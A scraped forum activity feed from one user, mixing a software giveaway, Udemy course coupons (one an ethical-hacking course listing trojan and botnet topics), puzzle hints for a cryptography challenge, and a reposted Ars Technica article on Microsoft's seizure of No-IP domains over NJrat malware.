  19. Burning Studio 2014 Get your burning projects done – fast and simple! Music Studio 4 Your life, your music, your Music Studio! Snap 6 Screenshots and videos the easy way: Point, click, done! Your photos as greeting cards! WinOptimizer 2014 Optimal improvement, maintenance and adjustment of your Windows® system! Here’s how it works: Enter your download code here in order to activate the access to your gifts. Then download, install and use one or even all of the five Ashampoo full versions below – guaranteed free and unrestricted. Your personal Ashampoo® gift
  20. Usr6

    Udemy

    Ethical Hacking for Beginners •Over 25 lectures and 4 hours of content! •You will learn Kali Linux OS •You will learn Metasploit framework •You will learn exploiting a vulnerability with Metasploit framework •You will learn Client Side Attacks •You will learn making trojan file •You will learn creating and managing a botnet •You will learn hiding trojan file from antivirus programs •You will learn detecting trojans in your systems •You will learn capturing network traffics •You will learn data mining from captured network traffics •You will learn Arp poisoning attack •You will learn Dns spoof attack https://www.udemy.com/ethical-hacking-for-beginners/?couponCode=FIRSTTIME
  21. Usr6

    The Thracians

    An additional hint for level 3, password = the access key to this level https://anonfiles.com/file/7817d6db8d6d7d38f47eb5596dfc2e03 one more hint for level 3: | |-| |-| | | | | | | | | | | | | | | | |_| |_| o
  22. You will start with lessons for installing Ruby on PC, and how to run simple programs. This Ruby training video is designed for the absolute beginner, and no prior programming experience is necessary. Some of the topics the course covers in this video training are; working with data and variables, operators and expressions, decision making (if and case statements), loops, methods and functions and object-oriented programming. You will also learn about exception handling, reading and writing files, and working with the Ruby debugger. In completing this computer based training course for Ruby programming, you will have a solid foundation to allow you to start creating programs using Ruby. SECTION 1:Introduction SECTION 2:Ruby Basics SECTION 3:Ruby Literals SECTION 4:Float SECTION 5:Strings SECTION 6:Boolean SECTION 7:Variable Naming SECTION 8:Ruby Variable Declaration SECTION 9:Arrays & Ruby Arrays Read SECTION 10:Ruby Arrays Creation Example SECTION 11:Hash SECTION 12:Ruby Operators Intro and Type SECTION 13:Arithmetic operators SECTION 14:Boolean SECTION 15:Assignment operator SECTION 16:Exceptions https://www.udemy.com/ruby-programming-for-beginners/?couponCode=tintin
  23. Usr6

    The Thracians

    @staticwater and the others who got stuck at level 3: It's not just "five or five", there is also a little animal in the picture; it would help if you knew how that little animal moves (let's suppose it existed in reality, that it was alive and wanted to go for a walk)
  24. Usr6

    The Thracians

    Hints: 3 levels, it starts classic, if it seems complicated you have taken the wrong approach
    Difficulty: accessible to any curious person with basic IT knowledge
    Type: mystery, history, cryptography
    The picture can be downloaded from here: https://anonfiles.com/file/6b6d2a6401cb71b463fd13e743542c65
    I am waiting for the solution by PM.
    //Those who unraveled the secret of the Thracians: @Alexander33
  25. Millions of legitimate servers that rely on dynamic domain name services from No-IP.com suffered outages on Monday after Microsoft seized 22 domain names it said were being abused in malware-related crimes against Windows users.

    Microsoft enforced a federal court order making the company the domain IP resolver for the No-IP domains. Microsoft said the objective of the seizure was to identify and reroute traffic associated with two malware families that abused No-IP services. Almost immediately, end-users, some of whom were actively involved in Internet security, castigated the move as heavy handed, since there was no evidence No-IP officially sanctioned or actively facilitated the malware campaign, which went by the names Bladabindi (aka NJrat) and Jenxcus (aka NJw0rm).

    "By becoming the DNS authority for those free dynamic DNS domains, Microsoft is now effectively in a position of complete control and is now able to dictate their configuration," Claudio Guarnieri, co-founder of Radically Open Security, wrote in an e-mail to Ars Technica. "Microsoft fundamentally swept away No-IP, which has seen parts of its own DNS infrastructure legally taken away."

    No-IP was no less critical of the move. In a statement that alleged damage to "millions of innocent users," company officials wrote:

    This morning, Microsoft served a federal court order and seized 22 of our most commonly used domains because they claimed that some of the subdomains have been abused by creators of malware. We were very surprised by this. We have a long history of proactively working with other companies when cases of alleged malicious activity have been reported to us. Unfortunately, Microsoft never contacted us or asked us to block any subdomains, even though we have an open line of communication with Microsoft corporate executives.

    We have been in contact with Microsoft today. They claim that their intent is to only filter out the known bad hostnames in each seized domain, while continuing to allow the good hostnames to resolve. However, this is not happening. Apparently, the Microsoft infrastructure is not able to handle the billions of queries from our customers. Millions of innocent users are experiencing outages to their services because of Microsoft’s attempt to remediate hostnames associated with a few bad actors. Had Microsoft contacted us, we could and would have taken immediate action. Microsoft now claims that it just wants to get us to clean up our act, but its draconian actions have affected millions of innocent Internet users.

    Vitalwerks and No-IP have a very strict abuse policy. Our abuse team is constantly working to keep the No-IP system domains free of spam and malicious activity. We use sophisticated filters and we scan our network daily for signs of malicious activity. Even with such precautions, our free dynamic DNS service does occasionally fall prey to cyberscammers, spammers, and malware distributors. But this heavy handed action by Microsoft benefits no one. We will do our best to resolve this problem quickly.

    In a blog post, Richard Domingues, assistant general counsel for the Microsoft digital crimes unit, said Microsoft pursued the seizure for No-IP's role "in creating, controlling, and assisting in infecting millions of computers with malicious software—harming Microsoft, its customers and the public at large." He added: "We're taking No-IP to task as the owner of infrastructure frequently exploited by cybercriminals to infect innocent victims with the Bladabindi (NJrat) and Jenxcus (NJw0rm) family of malware." He went on to say: "As malware authors continue to pollute the Internet, domain owners must act responsibly by monitoring for and defending against cybercrime on their infrastructure. If free Dynamic DNS providers like No-IP exercise care and follow industry best practices, it will be more difficult for cybercriminals to operate anonymously and harder to victimize people online."

    Dynamic DNS providers are popular because they allow people to obtain a free subdomain—such as dangoodin.no-ip.org—that automatically maps to whatever IP address the user's computer is using at the moment. The mapping changes each time the user's IP address is updated. Such services are especially loved by online gamers and Linux user group members. The services can also be popular with criminals running command and control servers that manage large numbers of infected computers.

    According to Domingues, No-IP domains were used 93 percent of the time by Bladabindi and Jenxcus. In the past year alone, the two malware families have been detected by Microsoft more than 7.4 million times, a figure that doesn't include detections by competing anti-malware services. Microsoft has more about the malware here and here.

    In a complaint Microsoft filed under seal on June 19, Microsoft attorneys said No-IP is "functioning as a major hub for 245 different types of malware circulating on the Internet." The document said abuse of the service has been the subject of recent blog posts by both OpenDNS and Cisco Systems. "Although Defendant Vitalwerks is on notice and should be aware that its services are heavily abused, it has failed to take sufficient steps to correct, remedy, or prevent the abuse and to keep its domains free from malicious activity," the attorneys wrote. In addition to naming No-IP, the complaint also charged two men who allegedly used No-IP to work with Bladabindi and Jenxcus control servers. More documents filed in the case are available here.

    Monday's seizure was the tenth major malware disruption Microsoft has participated in. The actions typically combine surprise technical and legal procedures that eradicate or significantly disrupt major botnets. Generally, law-abiding Internet users benefit from the actions because they vastly reduce a form of crime that's extremely difficult to combat. The latest action, however, underscores the darker side of these legal procedures, as millions of legitimate users get caught in the crossfire.

    Source: Millions of dynamic DNS users suffer after Microsoft seizes No-IP domains | Ars Technica